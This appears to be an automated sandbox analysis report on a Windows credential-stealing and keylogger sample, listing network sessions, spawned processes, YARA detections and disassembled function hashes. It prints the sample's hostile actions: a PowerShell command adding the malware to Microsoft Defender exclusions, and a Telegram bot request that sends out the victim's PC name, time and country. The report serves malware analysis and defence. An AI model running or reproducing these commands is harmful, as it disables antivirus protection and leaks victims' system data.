2024-10-29 09:16:17 UTC	359	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49753	188.114.97.3	443	2720	C:\Users\user\Desktop\M2AB8BeHc4.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 09:16:21 UTC	63	OUT	GET /xml/173.254.250.72 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-29 09:16:21 UTC	883	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:16:21 GMT Content-Type: text/xml Content-Length: 359 Connection: close apigw-requestid: AZ6gpggEPHcESXQ= Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 891 Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n4zHDWk6gMdpyneH2EsfXuTYMHU6A6L1HJIBYwv8xlBCNCCrmWvmuU4e8DLQLW3ek%2F5uhMuGRRHslWxiDIsY%2FvPF0dk3%2Bv7ddQjL1Nr1oQ6PiFiQxRn3kgkhkg2bg2MMNKKtrMda"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da210f7ee904858-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1241&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2227692&cwnd=240&unsent_bytes=0&cid=82e06946f15b10a1&ts=159&x=0"
2024-10-29 09:16:21 UTC	359	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49755	149.154.167.220	443	2720	C:\Users\user\Desktop\M2AB8BeHc4.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 09:16:22 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2029/10/2024%20/%2018:30:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-10-29 09:16:22 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 29 Oct 2024 09:16:22 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-29 09:16:22 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	0
Start time:	05:16:02
Start date:	29/10/2024
Path:	C:\Users\user\Desktop\M2AB8BeHc4.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\M2AB8BeHc4.exe"
Imagebase:	0x4c0000
File size:	983'040 bytes
MD5 hash:	CD437678986F11BA11E754BB1153F9A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1736837447.0000000004147000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1736837447.0000000004147000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1736837447.0000000004147000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1736837447.0000000004147000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:16:05
Start date:	29/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\M2AB8BeHc4.exe"
Imagebase:	0x7f0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:16:05
Start date:	29/10/2024
Path:	C:\Users\user\Desktop\M2AB8BeHc4.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\M2AB8BeHc4.exe"
Imagebase:	0x870000
File size:	983'040 bytes
MD5 hash:	CD437678986F11BA11E754BB1153F9A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4170386532.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4170386532.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4170386532.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4170386532.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4176439192.0000000002D17000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4176439192.0000000002D17000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4176439192.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	05:16:05
Start date:	29/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	05:16:08
Start date:	29/10/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	6.7%
Total number of Nodes:	165
Total number of Limit Nodes:	10

Executed Functions

Function 04E36C10 Relevance: 6.9, Strings: 5, Instructions: 629
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M, xrefs: 04E37113
-, xrefs: 04E36FA4
U, xrefs: 04E36F58
V, xrefs: 04E36DBC
?, xrefs: 04E36D70

Memory Dump Source

Source File: 00000000.00000002.1739343252.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e30000_M2AB8BeHc4.jbxd

Similarity

API ID:
String ID: -$?$M$U$V
API String ID: 0-3157906112
Opcode ID: 0ec8919b499ff7b99521e09fb3e9a2ee67ae6a1176d2c9221119fe218098d74d
Instruction ID: 5d97275784133ed197fa3349b762fa8c81027c23ad80d22addab2fa6cb85739e
Opcode Fuzzy Hash: 0ec8919b499ff7b99521e09fb3e9a2ee67ae6a1176d2c9221119fe218098d74d
Instruction Fuzzy Hash: 2D526C34600A45CFDB15EB74D868B9EBBB2FFC9301F108559E11AAB354DB74AD86CB80

Function 04E36C00 Relevance: 6.8, Strings: 5, Instructions: 568
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M, xrefs: 04E37113
-, xrefs: 04E36FA4
U, xrefs: 04E36F58
V, xrefs: 04E36DBC
?, xrefs: 04E36D70

Memory Dump Source

Source File: 00000000.00000002.1739343252.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e30000_M2AB8BeHc4.jbxd

Similarity

API ID:
String ID: -$?$M$U$V
API String ID: 0-3157906112
Opcode ID: a908c7911bcb63d17c6aa31eac6c0f898c359121d0999591976a40ffe6179d55
Instruction ID: e2747d8dbae44044dcea1227f20c6ae51699bad2a89cf23b5d4e9466354f8d8e
Opcode Fuzzy Hash: a908c7911bcb63d17c6aa31eac6c0f898c359121d0999591976a40ffe6179d55
Instruction Fuzzy Hash: D5425834A00A45CFDB15EF70D868AADBBB2FFC9341F148599E11A6B354DB346986CF80

Function 05448D90 Relevance: 1.6, APIs: 1, Instructions: 58
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 05449337

Memory Dump Source

Source File: 00000000.00000002.1740696453.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5440000_M2AB8BeHc4.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: e99e1d24b71237a9bd852ef0ba171860a1d6155fba41479c8594acff9b9145e6
Instruction ID: 31f7676cb29d212980c1569ad5c1feac4bd7ca28ea3ceb6d945d379adc9d8ed8
Opcode Fuzzy Hash: e99e1d24b71237a9bd852ef0ba171860a1d6155fba41479c8594acff9b9145e6
Instruction Fuzzy Hash: E821DBB5900358EFDB10DF9AD884ADEBBF5FB48310F10842AE928A7250D374A954CFA0

Function 054492B3 Relevance: 1.6, APIs: 1, Instructions: 56
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 05449337

Memory Dump Source

Source File: 00000000.00000002.1740696453.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5440000_M2AB8BeHc4.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 1c3f0d26aba2357f89bd65c432017ee535778eb9b077e68ab4e19ff2e1aaee6a
Instruction ID: 256bdbba6559447e64232b8f572409361e3d1d6b3131d89ead5987c315ece457
Opcode Fuzzy Hash: 1c3f0d26aba2357f89bd65c432017ee535778eb9b077e68ab4e19ff2e1aaee6a
Instruction Fuzzy Hash: 4621EDB5900348EFCB10DF9AD884ACEBBF4FB48310F10842AE918A7350C374A944CFA4

Function 054460D0 Relevance: .5, Instructions: 506COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1740696453.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5440000_M2AB8BeHc4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc2007265ee7e10ecf7e3744832c247538cca5a4a5c6dbe58c9d5eb010e4f6e0
Instruction ID: bbaa53d4936436d71d6a77f6b1b08ad3f92d78934f420115da61fa1b4b27d7c9
Opcode Fuzzy Hash: cc2007265ee7e10ecf7e3744832c247538cca5a4a5c6dbe58c9d5eb010e4f6e0
Instruction Fuzzy Hash: D5426E78E01219CFDB64CFA9C984B9DBBB2FB89311F1181A9D809A7355D734AD81CF50

Function 054460CB Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1740696453.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5440000_M2AB8BeHc4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0de5073c28654f24dbbc3b3fe632733df49398e24e3d53b5ef90261fb9e60726
Instruction ID: f8371d447e2f79ea74c52c7040eb29dcfd3273c32172aeb28e35132491062622
Opcode Fuzzy Hash: 0de5073c28654f24dbbc3b3fe632733df49398e24e3d53b5ef90261fb9e60726
Instruction Fuzzy Hash: 2E618275E01218DFEB18CFAAD984B9DBBB2FF88301F1581AAD809A7354D735A941CF50

Function 0283B130 Relevance: 1.7, APIs: 1, Instructions: 193
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0283B386

Memory Dump Source

Source File: 00000000.00000002.1735663111.0000000002830000.00000040.00000800.00020000.00000000.sdmp, Offset: 02830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2830000_M2AB8BeHc4.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: fa536f523b7eac9138869d16244ae717972634eeef12f9942d2ba05a1690e8f1
Instruction ID: ea026b7caafc163117f8a6d2b34cb387c03b3a1aec3da37024a3ca533bca7fb9
Opcode Fuzzy Hash: fa536f523b7eac9138869d16244ae717972634eeef12f9942d2ba05a1690e8f1
Instruction Fuzzy Hash: A77147B8A00B058FD725DF69D44475ABBF2FF88308F008A6ED48AD7A50DB74E945CB91

Function 04E31284 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04E34381

Memory Dump Source

Source File: 00000000.00000002.1739343252.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e30000_M2AB8BeHc4.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 6341ba59503d4f48f4615d5d8dc240609d493ef35014663611975171eb579be9
Instruction ID: 283c170d835fb8b7473b848248eb1a4e245a540fe3c3f93d930e921230de9d53
Opcode Fuzzy Hash: 6341ba59503d4f48f4615d5d8dc240609d493ef35014663611975171eb579be9
Instruction Fuzzy Hash: C64127B4A00309CFDB15CF99C888AAABBF5FF88315F248559D519A7361D734A845CFA0

Function 028345F0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02835DC1

Memory Dump Source

Source File: 00000000.00000002.1735663111.0000000002830000.00000040.00000800.00020000.00000000.sdmp, Offset: 02830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2830000_M2AB8BeHc4.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: b6b67128c179067f23eb789932794c03dfa678830ca4ee80ff63f7d2c78342ee
Instruction ID: 2753ae3ca5bfbeb600732878eef37df97402d135d704e1565dee3e2174d1a479
Opcode Fuzzy Hash: b6b67128c179067f23eb789932794c03dfa678830ca4ee80ff63f7d2c78342ee
Instruction Fuzzy Hash: 2141EFB4C0071DCBDB25DFA9C884B9EBBF5BF48304F20806AD409AB251DB756949CF91

Function 02835D04 Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02835DC1

Memory Dump Source

Source File: 00000000.00000002.1735663111.0000000002830000.00000040.00000800.00020000.00000000.sdmp, Offset: 02830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2830000_M2AB8BeHc4.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: eebbe2db919c2cdb619875d949086917a2855f9fb517e7982fe50b08e72824e6
Instruction ID: f260011b410f8f77504240acb38a5ab5cabf25b739f51bd2bd451a9eddae73b2
Opcode Fuzzy Hash: eebbe2db919c2cdb619875d949086917a2855f9fb517e7982fe50b08e72824e6
Instruction Fuzzy Hash: 6641DFB4C00719CBDB25DFA9C884BDEBBF5BF48304F20806AD409AB251DB75694ACF91

Function 0283D198 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0283D5CE,?,?,?,?,?), ref: 0283D68F

Memory Dump Source

Source File: 00000000.00000002.1735663111.0000000002830000.00000040.00000800.00020000.00000000.sdmp, Offset: 02830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2830000_M2AB8BeHc4.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 2d71bebb93f48d8f5b12074e74333b65f0cdaea0c229881895795ffb6b48a1f8
Instruction ID: 957724a3377f48b9fb15aa4fdc1e39e0d7adaaadca1ff96e25ecc3d1b25cf0f5
Opcode Fuzzy Hash: 2d71bebb93f48d8f5b12074e74333b65f0cdaea0c229881895795ffb6b48a1f8
Instruction Fuzzy Hash: 562114B59003089FDB10DF9AD884ADEBBF8EB48314F14841AE958A3351D378A954CFA4

Function 0283D601 Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0283D5CE,?,?,?,?,?), ref: 0283D68F

Memory Dump Source

Source File: 00000000.00000002.1735663111.0000000002830000.00000040.00000800.00020000.00000000.sdmp, Offset: 02830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2830000_M2AB8BeHc4.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 4ecfb99b4843f0a2ec1798f53d941443f2e4f4282c47cbeeb4bd9932d5e9eab4
Instruction ID: 83ff1e9c19c10a79e71511e780bb54d328a5b8cbf2bd9ca15865f4830641642f
Opcode Fuzzy Hash: 4ecfb99b4843f0a2ec1798f53d941443f2e4f4282c47cbeeb4bd9932d5e9eab4
Instruction Fuzzy Hash: B22112B9D003089FDB00CFA9D584ADEBBF5FB48320F10841AE958A3350D378A954CFA5

Function 05448DE0 Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OutputDebugStringW.KERNEL32(00000000), ref: 05449FD8

Memory Dump Source

Source File: 00000000.00000002.1740696453.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5440000_M2AB8BeHc4.jbxd

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: 8f142137e7d9d6a0b8835bbc8c37ea5f1baff4c64fed2544d0b3905981da3267
Instruction ID: 8ae3aaee051b82dad490a3893fb37dbb0c3af5555faab1d63283ad1dfe128fea
Opcode Fuzzy Hash: 8f142137e7d9d6a0b8835bbc8c37ea5f1baff4c64fed2544d0b3905981da3267
Instruction Fuzzy Hash: 741123B1C0461A9BDB14DF9AD844ADEFBF5FB88320F10815AE819B3340D774A944CFA5

Function 05449F60 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

OutputDebugStringW.KERNEL32(00000000), ref: 05449FD8

Memory Dump Source

Source File: 00000000.00000002.1740696453.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5440000_M2AB8BeHc4.jbxd

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: fc6a29bbbd242869a1694eaa061843c7b3e39b966e7efba6dbeeb6887dd4741e
Instruction ID: 8fda8a6729233c0dab20187870a769560e6ed680510f1da6145fbb7e807feb98
Opcode Fuzzy Hash: fc6a29bbbd242869a1694eaa061843c7b3e39b966e7efba6dbeeb6887dd4741e
Instruction Fuzzy Hash: CD1123B5C0461A8FDB14CF9AD944ADEFBF5FB48310F10812AD819A3340C334A944CFA5

Function 0283B320 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0283B386

Memory Dump Source

Source File: 00000000.00000002.1735663111.0000000002830000.00000040.00000800.00020000.00000000.sdmp, Offset: 02830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2830000_M2AB8BeHc4.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: bf8881ff298dad2e282ff8a79db9df6d254c8658a389ac99c450877401cd7f1e
Instruction ID: 3e5375e63c1ae8c590804390731925b501a2f299728f070ff49fec1f4ee641b7
Opcode Fuzzy Hash: bf8881ff298dad2e282ff8a79db9df6d254c8658a389ac99c450877401cd7f1e
Instruction Fuzzy Hash: 23110FB9C003498FCB10DF9AC844ADEFBF4EB88224F14841AD429A7210C379A549CFA1

Function 00B7D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1734291621.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b7d000_M2AB8BeHc4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f7282ce9c8b8ddb29d558fb21114d7a547eae7372732c24b611abb78fa7b836
Instruction ID: 1f755f901dcc92186b0ceb25173ec70bd12daaf7a6fb4cbe8354a45e09a19a68
Opcode Fuzzy Hash: 5f7282ce9c8b8ddb29d558fb21114d7a547eae7372732c24b611abb78fa7b836
Instruction Fuzzy Hash: 4B21E2B1604204DFDB05DF14D9C4B16BBB5FB94364F24C6A9D90E0A356C336E856C6A1

Function 00B7D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1734291621.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b7d000_M2AB8BeHc4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a49bd51605b63518ec35dbfbcc5be936da160571f4816233aeb19a997d38467
Instruction ID: 840de6e4aba3f7b7a8a4a6010ecc38b37bdd88d7e051b1fe4e18206400765fd6
Opcode Fuzzy Hash: 7a49bd51605b63518ec35dbfbcc5be936da160571f4816233aeb19a997d38467
Instruction Fuzzy Hash: 2421F471504240DFDB05DF14D9C4B26BFB5FFA4368F24C6A9D90A0A256C336D816D7A1

Function 00B8D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1734335652.0000000000B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8d000_M2AB8BeHc4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83732208b7bf931157acd99adca490e94596418d958fda4f0ae6cf6931ffdb1e
Instruction ID: 752df362d670aae051b2bac079b76545c87a68e526e0b3755ed471f1ef88a237
Opcode Fuzzy Hash: 83732208b7bf931157acd99adca490e94596418d958fda4f0ae6cf6931ffdb1e
Instruction Fuzzy Hash: B121D375604204DFDB14EF14D9D4B16BBA5EB94314F24C6AED80A4B3A6C336D807CB61

Function 00B8D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1734335652.0000000000B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8d000_M2AB8BeHc4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a9106230293789f5a7329df06202e8cafdddd1ebdadd67af429ed24b529f353
Instruction ID: 92f9aef098cc5463df2a66bc69019587e275493cf63ffdf5f4d9973d38d3fa21
Opcode Fuzzy Hash: 8a9106230293789f5a7329df06202e8cafdddd1ebdadd67af429ed24b529f353
Instruction Fuzzy Hash: F221C575604204EFDB05EF54D9C4B25BBE5FB94314F24CAAED90A4B2E1C336D846CB61

Function 00B8D006 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1734335652.0000000000B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8d000_M2AB8BeHc4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dfc9699c3ef8ff813dfa1850faef3f0f1f61a3e27a856126f909c6709ace74c
Instruction ID: d5b7a3e459da9c32a28fee9bbc790bd738566e65473a1e4f5b013032e2888858
Opcode Fuzzy Hash: 3dfc9699c3ef8ff813dfa1850faef3f0f1f61a3e27a856126f909c6709ace74c
Instruction Fuzzy Hash: 5021A4755093808FDB02DF24D5A4715BFB1EB45314F28C5DBD8498B2A7C33AD80ACB62

Function 00B7D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1734291621.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b7d000_M2AB8BeHc4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
Instruction ID: 5e378901f85ac226641545c148f004fab931b0f8e2500d99af38155bc62b8ec2
Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
Instruction Fuzzy Hash: C711D376504280CFCB16CF14D5C4B16BFB2FFA4324F24C6A9D8490B656C336D85ACBA1

Function 00B7D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

